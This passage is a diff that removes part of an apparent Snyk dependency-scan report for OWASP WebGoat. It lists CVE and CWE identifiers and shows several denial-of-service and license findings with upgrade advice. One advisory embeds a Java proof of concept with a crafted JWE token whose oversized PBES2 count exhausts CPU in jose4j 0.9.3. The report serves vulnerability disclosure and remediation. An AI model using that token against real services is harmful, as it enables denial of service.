-        "CWE-454",
-        "CVE-2025-11226"
-      ],
-      "00000016-0000-4000-8000-000000000016": [
-        "SNYK-JAVA-CHQOSLOGBACK-6094943",
-        "CVE-2023-6378",
-        "CWE-400"
-      ],
-      "00000017-0000-4000-8000-000000000017": [
-        "GHSA-hwpc-8xqv-jvj4",
-        "CVE-2021-21345",
-        "CWE-502",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088328"
-      ],
-      "00000018-0000-4000-8000-000000000018": [
-        "SNYK-JAVA-IOUNDERTOW-7361775",
-        "CVE-2024-1459",
-        "CWE-22"
-      ],
-      "00000019-0000-4000-8000-000000000019": [
-        "CVE-2021-39149",
-        "CWE-434",
-        "GHSA-3ccq-5vw3-2p6x",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569186"
-      ],
-      "0000001a-0000-4000-8000-00000000001a": [
-        "CWE-20",
-        "GHSA-7hwc-46rm-65jh",
-        "CVE-2017-7957",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-31394"
-      ],
-      "0000001b-0000-4000-8000-00000000001b": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230364",
-        "CVE-2024-38820",
-        "CWE-178"
-      ],
-      "0000001c-0000-4000-8000-00000000001c": [
-        "CVE-2021-29505",
-        "GHSA-7chv-rrw6-w6fc",
-        "CWE-502",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1294540"
-      ],
-      "0000001d-0000-4000-8000-00000000001d": [
-        "CVE-2022-40151",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3091180",
-        "GHSA-3mq5-fq9h-gj7j",
-        "CWE-400"
-      ],
-      "0000001e-0000-4000-8000-00000000001e": [
-        "CVE-2022-41966",
-        "CWE-400",
-        "GHSA-j563-grx4-pjpv",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3182897"
-      ],
-      "0000001f-0000-4000-8000-00000000001f": [
-        "CVE-2021-21342",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088338",
-        "CWE-502",
-        "GHSA-hvv8-336g-rx3m"
-      ],
-      "00000020-0000-4000-8000-000000000020": [
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569187",
-        "CWE-434",
-        "GHSA-8jrj-525p-826v",
-        "CVE-2021-39145"
-      ],
-      "00000021-0000-4000-8000-000000000021": [
-        "SNYK-JAVA-ORGYAML-3152153",
-        "CWE-20",
-        "CVE-2022-1471",
-        "GHSA-mjmj-j48q-9wg2"
-      ],
-      "00000022-0000-4000-8000-000000000022": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230366",
-        "CVE-2024-38820",
-        "CWE-178"
-      ],
-      "00000023-0000-4000-8000-000000000023": [
-        "SNYK-JAVA-IOUNDERTOW-6669948",
-        "CWE-770",
-        "CVE-2023-5379"
-      ],
-      "00000024-0000-4000-8000-000000000024": [
-        "snyk:lic:maven:org.hibernate.orm:hibernate-core:LGPL-2.1"
-      ],
-      "00000025-0000-4000-8000-000000000025": [
-        "GHSA-59jw-jqf4-3wq3",
-        "CWE-502",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088329",
-        "CVE-2021-21344"
-      ],
-      "00000026-0000-4000-8000-000000000026": [
-        "CVE-2024-3653",
-        "SNYK-JAVA-IOUNDERTOW-7433721",
-        "CWE-401",
-        "GHSA-ch7q-gpff-h9hp"
-      ],
-      "00000027-0000-4000-8000-000000000027": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790",
-        "CVE-2024-22259",
-        "CWE-601"
-      ],
-      "00000028-0000-4000-8000-000000000028": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980",
-        "CVE-2024-22262",
-        "CWE-601"
-      ],
-      "00000029-0000-4000-8000-000000000029": [
-        "CVE-2021-21348",
-        "GHSA-56p8-3fh9-4cvq",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088330",
-        "CWE-502"
-      ],
-      "0000002b-0000-4000-8000-00000000002b": [
-        "GHSA-4cch-wxpw-8p28",
-        "CWE-918",
-        "CVE-2020-26258",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051967"
-      ],
-      "0000002c-0000-4000-8000-00000000002c": [
-        "CVE-2023-4639",
-        "SNYK-JAVA-IOUNDERTOW-8383402",
-        "GHSA-3jrv-jgp8-45v3",
-        "CWE-444"
-      ],
-      "0000002d-0000-4000-8000-00000000002d": [
-        "SNYK-JAVA-CHQOSLOGBACK-6094942",
-        "CVE-2023-6378",
-        "CWE-400"
-      ],
-      "0000002e-0000-4000-8000-00000000002e": [
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-2388977",
-        "GHSA-rmr5-cpv2-vgjf",
-        "CVE-2021-43859",
-        "CWE-400"
-      ],
-      "0000002f-0000-4000-8000-00000000002f": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230373",
-        "CVE-2024-38819",
-        "CWE-23"
-      ],
-      "00000030-0000-4000-8000-000000000030": [
-        "CVE-2021-39153",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569176",
-        "CWE-434",
-        "GHSA-2q8x-2p7f-574v"
-      ],
-      "00000031-0000-4000-8000-000000000031": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6457293",
-        "CVE-2024-22257",
-        "CWE-284"
-      ],
-      "00000032-0000-4000-8000-000000000032": [
-        "GHSA-pr98-23f8-jwxv",
-        "CVE-2024-12798",
-        "CWE-138",
-        "SNYK-JAVA-CHQOSLOGBACK-8539867"
-      ],
-      "00000033-0000-4000-8000-000000000033": [
-        "CVE-2021-21347",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088332",
-        "GHSA-qpfq-ph7r-qv6f",
-        "CWE-502",
-        "CWE-94"
-      ],
-      "00000034-0000-4000-8000-000000000034": [
-        "CVE-2021-39144",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569183",
-        "GHSA-j9h8-phrw-h4fh",
-        "CWE-94"
-      ],
-      "00000035-0000-4000-8000-000000000035": [
-        "GHSA-43gc-mjxg-gvrq",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088335",
-        "CWE-502",
-        "CVE-2021-21350"
-      ],
-      "00000036-0000-4000-8000-000000000036": [
-        "SNYK-JAVA-CHQOSLOGBACK-6097493",
-        "CWE-400",
-        "CVE-2023-6481"
-      ],
-      "00000037-0000-4000-8000-000000000037": [
-        "GHSA-95h4-w6j8-2rp8",
-        "CVE-2025-9784",
-        "SNYK-JAVA-IOUNDERTOW-12458577",
-        "CWE-770",
-        "CWE-404"
-      ],
-      "00000038-0000-4000-8000-000000000038": [
-        "GHSA-jfvx-7wrx-43fh",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051966",
-        "CVE-2020-26259",
-        "CWE-22"
-      ],
-      "0000003a-0000-4000-8000-00000000003a": [
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569189",
-        "CVE-2021-39140",
-        "CWE-502",
-        "GHSA-6wf9-jmg9-vxcc"
-      ],
-      "0000003b-0000-4000-8000-00000000003b": [
-        "CVE-2024-22234",
-        "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254468",
-        "CWE-287"
-      ],
-      "0000003c-0000-4000-8000-00000000003c": [
-        "CVE-2021-21343",
-        "GHSA-74cv-f58x-f9wf",
-        "CWE-502",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088333"
-      ],
-      "0000003d-0000-4000-8000-00000000003d": [
-        "CVE-2024-38809",
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-7687447",
-        "CWE-625"
-      ],
-      "0000003e-0000-4000-8000-00000000003e": [
-        "GHSA-9442-gm4v-r222",
-        "CVE-2024-6162",
-        "CWE-400",
-        "SNYK-JAVA-IOUNDERTOW-7300152"
-      ],
-      "0000003f-0000-4000-8000-00000000003f": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230368",
-        "CVE-2024-38820",
-        "CWE-178"
-      ],
-      "00000040-0000-4000-8000-000000000040": [
-        "snyk:lic:maven:ch.qos.logback:logback-core:(EPL-1.0_OR_LGPL-2.1)"
-      ],
-      "00000041-0000-4000-8000-000000000041": [
-        "CVE-2021-39148",
-        "GHSA-qrx8-8545-4wg2",
-        "CWE-434",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569181"
-      ],
-      "00000042-0000-4000-8000-000000000042": [
-        "CWE-305",
-        "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-9486467",
-        "CVE-2025-22228"
-      ],
-      "00000043-0000-4000-8000-000000000043": [
-        "SNYK-JAVA-CHQOSLOGBACK-8539865",
-        "CVE-2024-12801",
-        "CWE-918",
-        "GHSA-6v67-2wr5-gvf4"
-      ],
-      "00000044-0000-4000-8000-000000000044": [
-        "CVE-2023-5685",
-        "CWE-400",
-        "SNYK-JAVA-ORGJBOSSXNIO-6403375"
-      ],
-      "00000045-0000-4000-8000-000000000045": [
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569180",
-        "CVE-2021-39146",
-        "CWE-434",
-        "GHSA-p8pq-r894-fm8f"
-      ],
-      "00000046-0000-4000-8000-000000000046": [
-        "snyk:lic:maven:ch.qos.logback:logback-classic:(EPL-1.0_OR_LGPL-2.1)"
-      ],
-      "00000047-0000-4000-8000-000000000047": [
-        "CVE-2024-27316",
-        "SNYK-JAVA-IOUNDERTOW-7300153",
-        "CWE-400"
-      ],
-      "00000048-0000-4000-8000-000000000048": [
-        "SNYK-JAVA-CHQOSLOGBACK-8539866",
-        "GHSA-pr98-23f8-jwxv",
-        "CVE-2024-12798",
-        "CWE-138"
-      ],
-      "00000049-0000-4000-8000-000000000049": [
-        "GHSA-xw4p-crpj-vjx2",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569190",
-        "CVE-2021-39152",
-        "CWE-502"
-      ],
-      "0000004a-0000-4000-8000-00000000004a": [
-        "CWE-265",
-        "SNYK-JAVA-ORGTHYMELEAF-5811866",
-        "CVE-2023-38286"
-      ],
-      "0000004b-0000-4000-8000-00000000004b": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230365",
-        "CVE-2024-38820",
-        "CWE-178"
-      ],
-      "0000004c-0000-4000-8000-00000000004c": [
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088331",
-        "GHSA-hrcp-8f3q-4w2c",
-        "CVE-2021-21351",
-        "CWE-502"
-      ],
-      "0000004d-0000-4000-8000-00000000004d": [
-        "CVE-2024-22234",
-        "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254467",
-        "CWE-287"
-      ],
-      "0000004e-0000-4000-8000-00000000004e": [
-        "CVE-2023-52428",
-        "CWE-770",
-        "SNYK-JAVA-COMNIMBUSDS-6247633"
-      ],
-      "0000004f-0000-4000-8000-00000000004f": [
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569178",
-        "CVE-2021-39139",
-        "GHSA-64xx-cq4q-mf44",
-        "CWE-94"
-      ],
-      "00000050-0000-4000-8000-000000000050": [
-        "CVE-2021-39151",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569179",
-        "CWE-434",
-        "GHSA-hph2-m3g5-xxv4"
-      ],
-      "00000051-0000-4000-8000-000000000051": [
-        "CVE-2025-43857",
-        "CWE-789",
-        "GHSA-j3g3-5qv5-52mj",
-        "SNYK-JAVA-ORGJRUBY-10557729"
-      ],
-      "00000052-0000-4000-8000-000000000052": [
-        "CWE-674",
-        "SNYK-JAVA-COMNIMBUSDS-10691768",
-        "CVE-2025-53864"
-      ],
-      "00000053-0000-4000-8000-000000000053": [
-        "CVE-2021-21346",
-        "GHSA-4hrm-m67v-5cxr",
-        "CWE-502",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088334"
-      ],
-      "00000054-0000-4000-8000-000000000054": [
-        "CWE-862",
-        "CVE-2024-38821",
-        "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-8309135"
-      ],
-      "00000055-0000-4000-8000-000000000055": [
-        "GHSA-f6hm-88x3-mfjv",
-        "CVE-2021-21349",
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088336",
-        "CWE-502"
-      ],
-      "00000056-0000-4000-8000-000000000056": [
-        "snyk:lic:maven:com.github.jnr:jnr-posix:(EPL-1.0_OR_GPL-2.0_OR_LGPL-2.1)"
-      ],
-      "00000057-0000-4000-8000-000000000057": [
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569191",
-        "GHSA-cxfm-5m4g-x7xp",
-        "CVE-2021-39150",
-        "CWE-502"
-      ],
-      "00000058-0000-4000-8000-000000000058": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586",
-        "CVE-2024-22243",
-        "CWE-918",
-        "CWE-601"
-      ],
-      "00000059-0000-4000-8000-000000000059": [
-        "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569185",
-        "GHSA-6w62-hx7r-mw68",
-        "CVE-2021-39154",
-        "CWE-434"
-      ],
-      "0000005c-0000-4000-8000-00000000005c": [
-        "CVE-2023-34053",
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-6091650",
-        "CWE-400"
-      ],
-      "0000005d-0000-4000-8000-00000000005d": [
-        "GHSA-72qj-48g4-5xgx",
-        "CWE-297",
-        "CVE-2025-46551",
-        "SNYK-JAVA-ORGJRUBY-10074039"
-      ],
-      "0000005e-0000-4000-8000-00000000005e": [
-        "SNYK-JAVA-ORGAPACHECOMMONS-10734078",
-        "CWE-674",
-        "CVE-2025-48924",
-        "GHSA-j288-q9x7-2f5v"
-      ],
-      "0000005f-0000-4000-8000-00000000005f": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862",
-        "GHSA-jjfh-589g-3hjx",
-        "CWE-400",
-        "CVE-2023-34055"
-      ],
-      "00000060-0000-4000-8000-000000000060": [
-        "CVE-2025-22235",
-        "CWE-20",
-        "SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-9804539"
-      ],
-      "00000061-0000-4000-8000-000000000061": [
-        "SNYK-JAVA-ORGSPRINGFRAMEWORK-12817817",
-        "CVE-2025-41249",
-        "GHSA-jmp9-x22r-554x",
-        "CWE-863"
-      ]
-    },
-    "findings": [
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) through the wildfly-http-client protocol, due to the `WriteTimeoutStreamSinkConduit` process. This vulnerability can be exploited by repeatedly opening and closing connections immediately, which triggers memory and file descriptor leaks.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.31.Final, 2.3.12.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/3cdb104e225f34547ce9fd6eb8799eb68e040f19)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/7d388c5aae9b82afb63f24e3b6a2044838dfb4de)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2264928)\n- [Red Hat Issues](https://issues.redhat.com/browse/UNDERTOW-2336)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-undertow",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "io.undertow:undertow-core",
-                  "version": "2.3.10.Final"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000001-0000-4000-8000-000000000001",
-          "locations": [
-            {
-              "package": {
-                "name": "io.undertow:undertow-core",
-                "version": "2.3.10.Final"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 113
-            }
-          },
-          "title": "Denial of Service (DoS)"
-        },
-        "id": "00000001-0000-4000-8000-000000000001",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "io.undertow:undertow-core",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-undertow",
-                          "version": "3.1.9"
-                        },
-                        {
-                          "name": "io.undertow:undertow-core",
-                          "version": "2.3.12.Final"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000001-0000-4000-8000-000000000001",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[org.bitbucket.b_c:jose4j](https://bitbucket.org/b_c/jose4j) is a robust and easy to use open source implementation of JSON Web Token (JWT) and the JOSE specification suite (JWS, JWE, and JWK). It is written in Java and relies solely on the JCA APIs for cryptography. Please see https://bitbucket.org/b_c/jose4j/wiki/Home for more info, examples, etc...\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large `p2c` (PBES2 Count) value. An attacker can cause the application to consume excessive CPU resources by supplying an unusually high PBES2 Count value.\n## PoC\n```java\r\n\r\nimport org.jose4j.jwa.AlgorithmConstraints;\r\nimport org.jose4j.jwe.ContentEncryptionAlgorithmIdentifiers;\r\nimport org.jose4j.jwe.JsonWebEncryption;\r\nimport org.jose4j.jwe.KeyManagementAlgorithmIdentifiers;\r\nimport org.jose4j.keys.AesKey;\r\nimport org.jose4j.lang.ByteUtil;\r\n\r\nimport java.security.Key;\r\n\r\npublic class jwt {\r\n    public static void main(String[] argc)throws Exception{\r\n        Key key = new AesKey(ByteUtil.randomBytes(16));\r\n        JsonWebEncryption jwe = new JsonWebEncryption();\r\n        jwe.setAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,\r\n                KeyManagementAlgorithmIdentifiers.PBES2_HS256_A128KW));\r\n        jwe.setContentEncryptionAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,\r\n                ContentEncryptionAlgorithmIdentifiers.AES_128_CBC_HMAC_SHA_256));\r\n        jwe.setKey(key);\r\n        jwe.setCompactSerialization(\"eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJ1RWxQUGhJLThGY2h3a1BhIn0=.JOIw8ccIdkor7-ZaHQz6pUkqj2VEL_XIuonOwdSrdeXxFb7qN8FZKw.1-ZgAG8KzCbl6wDjUzrsTw.0pLJ0ZEu9OMYV1jyfPIrqg.gFNkCEwB1lf_Jovc7ZOd5w\");\r\n        System.out.println(\"Payload: \" + jwe.getPayload());\r\n    }\r\n}\r\n\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.bitbucket.b_c:jose4j` to version 0.9.4 or higher.\n## References\n- [Bitbucket Commit](https://bitbucket.org/b_c/jose4j/commits/1afaa1e174b3)\n- [Bitbucket Issue](https://bitbucket.org/b_c/jose4j/issues/212)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.bitbucket.b_c:jose4j",
-                  "version": "0.9.3"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000003-0000-4000-8000-000000000003",
-          "locations": [
-            {
-              "package": {
-                "name": "org.bitbucket.b_c:jose4j",
-                "version": "0.9.3"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 194
-            }
-          },
-          "title": "Denial of Service (DoS)"
-        },
-        "id": "00000003-0000-4000-8000-000000000003",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.bitbucket.b_c:jose4j",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.bitbucket.b_c:jose4j",
-                          "version": "0.9.4"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000003-0000-4000-8000-000000000003",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[ch.qos.logback:logback-classic](https://mvnrepository.com/artifact/ch.qos.logback/logback-classic) is a reliable, generic, fast and flexible logging library for Java.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') via the `logback receiver` component. An attacker can mount a denial-of-service attack by sending poisoned data.\r\n\r\n**Note:**\r\n\r\nSuccessful exploitation requires the logback-receiver component being enabled and also reachable by the attacker.\n## Remediation\nUpgrade `ch.qos.logback:logback-classic` to version 1.2.13, 1.3.14, 1.4.14 or higher.\n## References\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/7018a3609c7bcc9dc7bf5903509901a986e5f578)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/bb095154be011267b64e37a1d401546e7cc2b7c3)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/c612b2fa3caf6eef3c75f1cd5859438451d0fd6f)\n- [Release Notes](https://logback.qos.ch/news.html#1.2.13)\n- [Release Notes](https://logback.qos.ch/news.html#1.3.14)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-validation",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-logging",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "ch.qos.logback:logback-classic",
-                  "version": "1.4.11"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000004-0000-4000-8000-000000000004",
-          "locations": [
-            {
-              "package": {
-                "name": "ch.qos.logback:logback-classic",
-                "version": "1.4.11"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 80
-            }
-          },
-          "title": "Uncontrolled Resource Consumption ('Resource Exhaustion')"
-        },
-        "id": "00000004-0000-4000-8000-000000000004",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "ch.qos.logback:logback-classic",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-validation",
-                          "version": "3.1.7"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter",
-                          "version": "3.1.7"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-logging",
-                          "version": "3.1.7"
-                        },
-                        {
-                          "name": "ch.qos.logback:logback-classic",
-                          "version": "1.4.14"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000004-0000-4000-8000-000000000004",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "LGPL-2.1 license",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-data-jpa",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.hibernate.orm:hibernate-core",
-                  "version": "6.2.13.Final"
-                },
-                {
-                  "name": "org.hibernate.common:hibernate-commons-annotations",
-                  "version": "6.0.6.Final"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000005-0000-4000-8000-000000000005",
-          "locations": [
-            {
-              "package": {
-                "name": "org.hibernate.common:hibernate-commons-annotations",
-                "version": "6.0.6.Final"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {},
-          "title": "LGPL-2.1 license"
-        },
-        "id": "00000005-0000-4000-8000-000000000005",
-        "links": {},
-        "relationships": {},
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Improper Input Validation via the `FormAuthenticationMechanism`. An attacker can exhaust the server's memory, leading to a Denial of Service by sending crafted requests that cause an OutofMemory error.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.32.Final, 2.3.13.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/0410f3c4d9b39b754a2203a29834cac51da11258)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/ddb4aeeb32f7ed58d715124acf1d464fc14b30dd/core/src/main/java/io/undertow/security/impl/FormAuthenticationMechanism.java#L46)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-undertow",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "io.undertow:undertow-core",
-                  "version": "2.3.10.Final"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000006-0000-4000-8000-000000000006",
-          "locations": [
-            {
-              "package": {
-                "name": "io.undertow:undertow-core",
-                "version": "2.3.10.Final"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 101
-            }
-          },
-          "title": "Improper Input Validation"
-        },
-        "id": "00000006-0000-4000-8000-000000000006",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "io.undertow:undertow-core",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-undertow",
-                          "version": "3.1.12"
-                        },
-                        {
-                          "name": "io.undertow:undertow-core",
-                          "version": "2.3.13.Final"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000006-0000-4000-8000-000000000006",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
